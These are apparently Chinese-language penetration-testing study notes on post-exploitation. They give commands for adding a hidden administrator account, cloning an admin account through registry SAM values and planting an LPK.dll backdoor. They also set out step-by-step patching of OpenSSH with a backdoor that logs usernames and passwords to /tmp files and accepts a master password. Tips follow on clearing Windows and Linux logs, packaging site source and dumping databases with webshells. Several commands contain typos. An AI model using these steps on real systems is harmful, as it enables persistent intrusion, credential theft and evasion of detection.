渗透测试学习 二十六、提权 远控

后渗透

         留后门，方便下次入侵

         清理痕迹

         数据库脱库测试

         源码打包

 

Windows后门安装

         账号后门（用户后门）

         LPK后门（程序后门）

         木马后门（程序后门）

 

账号后门

         net user

         net user a$ a /add

         net localgrop administrators a /add

 

support_338945ao 克隆账号 1、先设置密码

打开注册表 regedit

HKET_LOCAL_MACHINE-ASM-SAM-Domains-User-Name

找到管理员，打开管理员的F值，全复制

找到要克隆的账号，打开F值，全选粘贴替换掉

 

为什么要克隆账号

1、首次，在一个用户登录计算机时，会在c:\Documents and settings里面有记录

即创建一个账号远程登录后，会创建一个家目录，

但克隆后的账号登录后并不会有这种情况。

 

LPK后门

         生成LPK.dll

 

木马后门

 

Linux安装后门

         tar zxvf openssh-5.9p1.tar.gz

         tar zxvf Ox06-0penssh-5.9p1.patch.tar.gz

         cd openssh-5.9p1.patch/

         cp sshbd5.9p1.diff ../openssh-5.9p1

         cd ../openssh-5.9p1

         patch < sshbd5.9p1.diff //patch 后门

         vi includes.h //修改后门密码，记录文件位置

         /*

         +#define ILOG “/tmp/ilog”      //记录登录到本机的用户名和密码

         +#define OLOG “/tmp/olog”             //记录本机登录到远程的用户名和密码

         +#define  SECRETPW “123456321”         //后门密码

         */

 

先安装所需环境

         yum install –y openssl openssl-devel pam-devel

         ./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5

注意，要是出现：

configure:error:*** zlib.h missing –please install first or check config.log

需要安装zlib

yum install –y zlib zlib-devel    //http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download

需要make clean

make && make install     //编译和安装

serrice sshd restart                   //重启sshed

然后登录

 

Windows系统日志清除         

扫描/访问日志-都是和网站进行交互-记录在访问日志

上传后门-看文件日期            

我的电脑-管理-事件查看器-安全性-审核成功

网站日志-网站-属性-日志

文件目录

 

Linux系统日志清除

历史命令

访问日志：

ls /var/log/httpd/access_log

ls /etc/httpd/logs/access_log

 

源码打包

         asp+access     

         asp+sqlserver

         大马中的服务器打包

 

脱库

         菜刀、大马、脱裤马、、、